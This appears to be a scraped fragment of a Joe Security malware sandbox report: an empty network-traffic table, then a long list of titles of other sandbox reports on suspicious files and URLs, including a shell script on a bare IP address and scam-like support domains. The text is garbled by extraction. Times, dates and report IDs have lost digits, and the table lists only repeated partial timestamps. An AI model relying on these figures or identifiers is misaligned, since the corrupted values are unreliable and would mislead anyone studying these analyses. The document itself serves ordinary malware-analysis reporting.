Copyright Joe Security LLC 2018 Page 20 of 32

21 Timestamp Port Dest Port IP Dest IP Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :07: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Jul 11, :08: CEST Copyright Joe Security LLC 2018 Page 21 of 32

Similar documents

ID: Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version: ID: 51630 Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: browseurl.jbs Time: 12:58:02 Date: 02/04/2018 Version:

ID: Cookbook: browseurl.jbs Time: 12:58:02 Date: 02/04/2018 Version: ID: 5253 Cookbook: browseurl.jbs Time: 12:5:02 Date: 02/04/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 13:10:41 Date: 01/04/2018 Version:

ID: Cookbook: browseurl.jbs Time: 13:10:41 Date: 01/04/2018 Version: ID: 52775 Cookbook: browseurl.jbs Time: 13:10:41 Date: 01/04/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 16:58:45 Date: 04/06/2018 Version:

ID: Cookbook: browseurl.jbs Time: 16:58:45 Date: 04/06/2018 Version: ID: 62529 Cookbook: browseurl.jbs Time: 16:58:45 Date: 04/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: browseurl.jbs Time: 10:12:02 Date: 15/01/2018 Version:

ID: Cookbook: browseurl.jbs Time: 10:12:02 Date: 15/01/2018 Version: ID: 42670 Cookbook: browseurl.jbs Time: 10:12:02 Date: 15/01/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 16:56:06 Date: 13/02/2018 Version:

ID: Cookbook: browseurl.jbs Time: 16:56:06 Date: 13/02/2018 Version: ID: 46296 Cookbook: browseurl.jbs Time: 16:56:06 Date: 13/02/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 15:46:38 Date: 29/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:46:38 Date: 29/03/2018 Version: ID: 52374 Cookbook: browseurl.jbs Time: 15:46:3 Date: 29/03/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 07:02:50 Date: 27/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 07:02:50 Date: 27/03/2018 Version: ID: 51900 Cookbook: browseurl.jbs Time: 07:02:50 Date: 27/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature Overview Networking:

More information

ID: Cookbook: browseurl.jbs Time: 17:39:02 Date: 22/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 17:39:02 Date: 22/03/2018 Version: ID: 5139 Cookbook: browseurl.jbs Time: 17:39:02 Date: 22/03/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 11:59:06 Date: 14/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 11:59:06 Date: 14/05/2018 Version: ID: 5945 Cookbook: browseurl.jbs Time: 11:59:06 Date: 14/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 20:27:59 Date: 16/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:27:59 Date: 16/03/2018 Version: ID: 50646 Cookbook: browseurl.jbs Time: 20:27:59 Date: 16/03/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Sample Name: 21PO jpg...js Cookbook: default.jbs Time: 14:32:06 Date: 21/11/2017 Version:

ID: Sample Name: 21PO jpg...js Cookbook: default.jbs Time: 14:32:06 Date: 21/11/2017 Version: ID: 371 Sample Name: 21PO201745.jpg...js Cookbook: default.jbs Time: 14:32:0 Date: 21/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 15:48:15 Date: 29/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:48:15 Date: 29/03/2018 Version: ID: 52376 Cookbook: browseurl.jbs Time: 15:4:15 Date: 29/03/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 20:56:26 Date: 03/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:56:26 Date: 03/07/2018 Version: ID: 66665 Cookbook: browseurl.jbs Time: 20:56:26 Date: 03/07/2018 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: browseurl.jbs Time: 14:46:55 Date: 31/08/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:46:55 Date: 31/08/2018 Version: ID: 74919 Cookbook: browseurl.jbs Time: 14:46:55 Date: 31/08/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report http://tiny.cc/34aqxy Overview General Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 13:46:19 Date: 09/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 13:46:19 Date: 09/05/2018 Version: ID: 5702 Cookbook: browseurl.jbs Time: 13:46:19 Date: 09/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 22:12:09 Date: 17/11/2017 Version:

ID: Cookbook: browseurl.jbs Time: 22:12:09 Date: 17/11/2017 Version: ID: 37366 Cookbook: browseurl.jbs Time: 22:12:09 Date: 17/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Sample Name: FsQHOWXph8.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 20:31:13 Date: 16/03/2018 Version:

ID: Sample Name: FsQHOWXph8.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 20:31:13 Date: 16/03/2018 Version: ID: 50648 Sample Name: FsQHOWXph8.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 20:31: Date: 16/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

More information

ID: Cookbook: urldownload.jbs Time: 20:09:25 Date: 13/06/2018 Version:

ID: Cookbook: urldownload.jbs Time: 20:09:25 Date: 13/06/2018 Version: ID: 3923 Cookbook: urldownload.jbs Time: 20:09:25 Date: 13/0/201 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: MobaXterm_installer.dat Cookbook: default.jbs Time: 18:29:43 Date: 25/05/2018 Version:

ID: Sample Name: MobaXterm_installer.dat Cookbook: default.jbs Time: 18:29:43 Date: 25/05/2018 Version: ID: 1259 Sample Name: MobaXterm_installer.dat Cookbook: default.jbs Time: 1:29:43 Date: 25/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection

More information

ID: Cookbook: urldownload.jbs Time: 16:41:45 Date: 23/06/2018 Version:

ID: Cookbook: urldownload.jbs Time: 16:41:45 Date: 23/06/2018 Version: ID: 52 Cookbook: urldownload.jbs Time: 1:41:45 Date: 23/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

More information

ID: Sample Name: js.jar Cookbook: defaultwindowsfilecookbook.jbs Time: 10:01:15 Date: 26/09/2018 Version:

ID: Sample Name: js.jar Cookbook: defaultwindowsfilecookbook.jbs Time: 10:01:15 Date: 26/09/2018 Version: ID: 80115 Sample Name: js.jar Cookbook: defaultwindowsfilecookbook.jbs Time: 10:01:15 Date: 26/09/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report js.jar Overview General Information

More information

ID: Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version: ID: 64085 Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: test.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 18:57:54 Date: 12/04/2018 Version:

ID: Sample Name: test.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 18:57:54 Date: 12/04/2018 Version: ID: 54427 Sample Name: test.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 18:57:54 Date: /04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection Confidence Classification

More information

ID: Cookbook: urldownload.jbs Time: 11:39:45 Date: 07/04/2018 Version:

ID: Cookbook: urldownload.jbs Time: 11:39:45 Date: 07/04/2018 Version: ID: 53619 Cookbook: urldownload.jbs Time: 11:39:45 Date: 07/04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: urldownload.jbs Time: 19:58:34 Date: 02/05/2018 Version:

ID: Cookbook: urldownload.jbs Time: 19:58:34 Date: 02/05/2018 Version: ID: 57706 Cookbook: urldownload.jbs Time: 19:5:34 Date: 02/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Sample Name: image002 Cookbook: default.jbs Time: 18:19:28 Date: 18/05/2018 Version:

ID: Sample Name: image002 Cookbook: default.jbs Time: 18:19:28 Date: 18/05/2018 Version: ID: 0309 Sample Name: image002 Cookbook: default.jbs Time: 1:19:2 Date: 1/05/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Cookbook: urldownload.jbs Time: 19:53:36 Date: 07/03/2018 Version:

ID: Cookbook: urldownload.jbs Time: 19:53:36 Date: 07/03/2018 Version: ID: 49 Cookbook: urldownload.jbs Time: 19:: Date: 0/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice

More information

ID: Cookbook: browseurl.jbs Time: 14:54:22 Date: 05/09/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:54:22 Date: 05/09/2018 Version: ID: 75522 Cookbook: browseurl.jbs Time: 14:54:22 Date: 05/09/2018 Version: 23.0.0 Table of Contents Table of Contents 2 Analysis Report http://www.springdwnld2.com/download/? d=0&h=1&pnid=4&domain=hmapsanddrivingdirection.com&implementation_id=maps_spt_&source=g-ccc7-lp0-

More information

ID: Cookbook: urldownload.jbs Time: 22:46:20 Date: 19/02/2018 Version:

ID: Cookbook: urldownload.jbs Time: 22:46:20 Date: 19/02/2018 Version: ID: 4706 Cookbook: urldownload.jbs Time: 22:46:20 Date: 1/02/201 Version: 21.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

More information

ID: Cookbook: urldownload.jbs Time: 08:25:02 Date: 29/10/2018 Version: Fire Opal

ID: Cookbook: urldownload.jbs Time: 08:25:02 Date: 29/10/2018 Version: Fire Opal ID: Cookbook: urldownload.jbs Time: 0:25:02 Date: 29//201 Version: 24.0.0 Fire Opal Table of Contents Table of Contents Analysis Report http://15.1..14/neko.sh Overview General Information Detection Confidence

More information

ID: Sample Name: Dxd1yOZMU1.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 09:43:59 Date: 21/10/2017 Version:

ID: Sample Name: Dxd1yOZMU1.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 09:43:59 Date: 21/10/2017 Version: ID: 34788 Sample Name: Dxd1yOZMU1.bin Cookbook: defaultwindowsofficecookbook.jbs Time: 0:43:5 Date: 21/10/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information

More information

ID: Sample Name: FD-1 Phase Out Notice.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:36:29 Date: 04/05/2018 Version: 22.0.

ID: Sample Name: FD-1 Phase Out Notice.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:36:29 Date: 04/05/2018 Version: 22.0. ID: 5762 Sample Name: FD-1 Phase Out Notice.doc Cookbook: defaultwindowsofficecookbook.jbs Time: :36:2 Date: 04/05/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection

More information

ID: Cookbook: urldownload.jbs Time: 20:31:22 Date: 09/08/2018 Version:

ID: Cookbook: urldownload.jbs Time: 20:31:22 Date: 09/08/2018 Version: ID: 153 Cookbook: urldownload.jbs Time: 20:31:22 Date: 09/0/201 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: Fire Opal

ID: Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: Fire Opal ID: 82913 Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: 24.0.0 Fire Opal Table of Contents Table of Contents Analysis Report http://www.learningtoolkit.club Overview General Information

More information

ID: Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version:

ID: Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version: ID: 54075 Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version: ID: 66523 Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Sample Name: maintools.js Cookbook: default.jbs Time: 15:43:35 Date: 17/02/2018 Version:

ID: Sample Name: maintools.js Cookbook: default.jbs Time: 15:43:35 Date: 17/02/2018 Version: ID: 48 Sample Name: maintools.js Cookbook: default.jbs Time: 1:43:3 Date: 1/02/2018 Version: 21.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 15:47:47 Date: 11/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:47:47 Date: 11/05/2018 Version: ID: 59136 Cookbook: browseurl.jbs Time: 15:47:47 Date: 11/05/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

More information

ID: Sample Name: test.txt Cookbook: default.jbs Time: 13:18:36 Date: 31/03/2018 Version:

ID: Sample Name: test.txt Cookbook: default.jbs Time: 13:18:36 Date: 31/03/2018 Version: ID: 5250 Sample Name: test.txt Cookbook: default.jbs Time: 13:18:3 Date: 31/03/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version: ID: 80599 Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report http://www.qbproadvisorshelp.com Overview General Information Detection

More information

ID: Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version: ID: 70096 Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: tesseract-ocrsetup exe. Cookbook: default.jbs Time: 16:44:15 Date: 12/02/2018 Version:

ID: Sample Name: tesseract-ocrsetup exe. Cookbook: default.jbs Time: 16:44:15 Date: 12/02/2018 Version: ID: 46161 Sample Name: tesseract-ocrsetup-3.05.01.exe Cookbook: default.jbs Time: 16:44:15 Date: 12/02/2018 Version: 20.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Cookbook: urldownload.jbs Time: 18:48:38 Date: 19/06/2018 Version:

ID: Cookbook: urldownload.jbs Time: 18:48:38 Date: 19/06/2018 Version: ID: 64646 Cookbook: urldownload.jbs Time: 1:4:3 Date: 19/06/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

More information

ID: Sample Name: MSM- 24_Supply_List RU_518.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 17:15:48 Date: 19/06/2018 Version: 22.0.

ID: Sample Name: MSM- 24_Supply_List RU_518.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 17:15:48 Date: 19/06/2018 Version: 22.0. ID: 64635 Sample Name: MSM- 24_Supply_List RU_518.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 17::48 Date: 1/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection

More information

ID: Sample Name: fly.jse Cookbook: default.jbs Time: 18:17:26 Date: 11/11/2017 Version:

ID: Sample Name: fly.jse Cookbook: default.jbs Time: 18:17:26 Date: 11/11/2017 Version: ID: 371 Sample Name: fly.jse Cookbook: default.jbs Time: 1:17:2 Date: 11/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence Classification

More information

ID: Sample Name: quzpecasrh Cookbook: default.jbs Time: 16:55:54 Date: 07/10/2017 Version:

ID: Sample Name: quzpecasrh Cookbook: default.jbs Time: 16:55:54 Date: 07/10/2017 Version: ID: 3393 Sample Name: quzpecasrh Cookbook: default.jbs Time: 1:55:54 Date: 0//201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Cookbook: browseurl.jbs Time: 18:05:31 Date: 26/12/2017 Version:

ID: Cookbook: browseurl.jbs Time: 18:05:31 Date: 26/12/2017 Version: ID: 41000 Cookbook: browseurl.jbs Time: 1:05:31 Date: 26/12/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: urldownload.jbs Time: 22:26:00 Date: 30/12/2017 Version:

ID: Cookbook: urldownload.jbs Time: 22:26:00 Date: 30/12/2017 Version: ID: 41304 Cookbook: urldownload.jbs Time: 22:26:00 Date: 30/12/2017 Version: 20.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature Overview

More information

ID: Cookbook: urldownload.jbs Time: 02:55:04 Date: 01/02/2018 Version:

ID: Cookbook: urldownload.jbs Time: 02:55:04 Date: 01/02/2018 Version: ID: 4441 Cookbook: urldownload.jbs Time: 02:55:04 Date: 01/02/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

More information

ID: Sample Name: Serial.txt Cookbook: default.jbs Time: 02:59:20 Date: 07/05/2018 Version:

ID: Sample Name: Serial.txt Cookbook: default.jbs Time: 02:59:20 Date: 07/05/2018 Version: ID: 58133 Sample Name: Serial.txt Cookbook: default.jbs Time: 02:5:20 Date: 0/05/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: SSI Set Details.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 01:14:07 Date: 13/04/2018 Version: 22.0.

ID: Sample Name: SSI Set Details.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 01:14:07 Date: 13/04/2018 Version: 22.0. ID: 54478 Sample Name: SSI Set Details.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 01:14:07 Date: /04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

More information

ID: Sample Name: Luxus.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 10:22:08 Date: 09/01/2018 Version:

ID: Sample Name: Luxus.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 10:22:08 Date: 09/01/2018 Version: ID: 42035 Sample Name: Luxus.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 10:22:08 Date: 09/01/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection

More information

ID: Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version:

ID: Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version: ID: 45263 Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version: 20.0.0 Table of Contents Analysis Report Overview Information Detection Confidence Classification

More information

ID: Sample Name: testfiletestfile.txt Cookbook: default.jbs Time: 15:24:30 Date: 06/07/2018 Version:

ID: Sample Name: testfiletestfile.txt Cookbook: default.jbs Time: 15:24:30 Date: 06/07/2018 Version: ID: 6045 Sample Name: testfiletestfile.txt Cookbook: default.jbs Time: 15:24:30 Date: 06/0/201 Version: 23.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection

More information

ID: Sample Name: INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0.

ID: Sample Name: INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0. ID: 56519 Sample Name: 20180542 INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview Information

More information

ID: Sample Name: TO_HM_CROWN PR#U0130NCE MOHAMMED B#U0130N SALMAN - Dear Prime Minister.doc Cookbook: defaultwindowsofficecookbook.

ID: Sample Name: TO_HM_CROWN PR#U0130NCE MOHAMMED B#U0130N SALMAN - Dear Prime Minister.doc Cookbook: defaultwindowsofficecookbook. ID: 63341 Sample Name: TO_HM_CROWN PR#U0130NCE MOHAMMED B#U0130N SALMAN - Dear Prime Minister.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 08:43:14 Date: 10/06/2018 Version: 22.0.0 Table of Contents

More information

ID: Sample Name: Liste_az.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 00:17:54 Date: 30/12/2017 Version:

ID: Sample Name: Liste_az.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 00:17:54 Date: 30/12/2017 Version: ID: 41280 Sample Name: Liste_az.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 00:17:54 Date: 30/12/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information

More information

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date:

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date: ID: 244 Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date: 05/10/201 Version: 24.0.0 Fire Opal Table of Contents

More information

ID: Sample Name: text_0.txt Cookbook: default.jbs Time: 16:20:15 Date: 12/01/2018 Version:

ID: Sample Name: text_0.txt Cookbook: default.jbs Time: 16:20:15 Date: 12/01/2018 Version: ID: 4253 Sample Name: text_0.txt Cookbook: default.jbs Time: 1:20:15 Date: 12/01/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: Payment_Remittance#.xps Cookbook: defaultwindowsofficecookbook.jbs Time: 01:35:46 Date: 20/09/2018 Version: 23.0.

ID: Sample Name: Payment_Remittance#.xps Cookbook: defaultwindowsofficecookbook.jbs Time: 01:35:46 Date: 20/09/2018 Version: 23.0. ID: 25 Sample Name: Payment_Remittance#.xps Cookbook: defaultwindowsofficecookbook.jbs Time: 01:35:4 Date: 20/09/201 Version: 23.0.0 Table of Contents Table of Contents Analysis Report Payment_Remittance#.xps

More information

ID: Cookbook: browseurl.jbs Time: 14:02:12 Date: 23/11/2018 Version: Fire Opal

ID: Cookbook: browseurl.jbs Time: 14:02:12 Date: 23/11/2018 Version: Fire Opal ID: 92832 Cookbook: browseurl.jbs Time: 14:02:12 Date: 23/11/2018 Version: 24.0.0 Fire Opal Table of Contents Table of Contents Analysis Report http://www.winsupport.ml Overview Information Detection Confidence

More information

ID: Sample Name: scan00.html Cookbook: default.jbs Time: 22:21:27 Date: 16/12/2017 Version:

ID: Sample Name: scan00.html Cookbook: default.jbs Time: 22:21:27 Date: 16/12/2017 Version: ID: 40269 Sample Name: scan00.html Cookbook: default.jbs Time: 22:21:27 Date: 16/12/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: New invoice doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:49:06 Date: 07/11/2017 Version: 20.0.

ID: Sample Name: New invoice doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:49:06 Date: 07/11/2017 Version: 20.0. ID: 36381 Sample Name: New invoice 1385371761.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:4:06 Date: 07/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview

More information

ID: Sample Name: E DA5e8a0c01b.txt Cookbook: default.jbs Time: 15:35:01 Date: 18/04/2018 Version:

ID: Sample Name: E DA5e8a0c01b.txt Cookbook: default.jbs Time: 15:35:01 Date: 18/04/2018 Version: ID: 55401 Sample Name: E203182DA5e8a0c01b.txt Cookbook: default.jbs Time: 15:35:01 Date: 18/04/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection

More information

ID: Sample Name: _ doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0.

ID: Sample Name: _ doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0. ID: 34737 Sample Name: 20170927_655387.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

More information

ID: Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:34 Date: 26/07/2018 Version:

ID: Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:34 Date: 26/07/2018 Version: ID: 90 Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:4 Date: 2/0/201 Version: 2.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Cookbook: browseurl.jbs Time: 19:21:50 Date: 15/10/2017 Version:

ID: Cookbook: browseurl.jbs Time: 19:21:50 Date: 15/10/2017 Version: ID: 34266 Cookbook: browseurl.jbs Time: 19:21:50 Date: 15/10/2017 Version: 20.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: MacKeeper.dmg Cookbook: default.jbs Time: 11:09:32 Date: 02/06/2018 Version:

ID: Sample Name: MacKeeper.dmg Cookbook: default.jbs Time: 11:09:32 Date: 02/06/2018 Version: ID: 22 Sample Name: MacKeeper.dmg Cookbook: default.jbs Time: 11:0:2 Date: 02/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: FORMP16T.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 09:39:29 Date: 28/05/2018 Version:

ID: Sample Name: FORMP16T.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 09:39:29 Date: 28/05/2018 Version: ID: 61383 Sample Name: FORMP16T.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 09:39:29 Date: 28/05/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information

More information

ID: Sample Name: NEW ORDER LIST.jar Cookbook: default.jbs Time: 10:19:47 Date: 19/02/2018 Version:

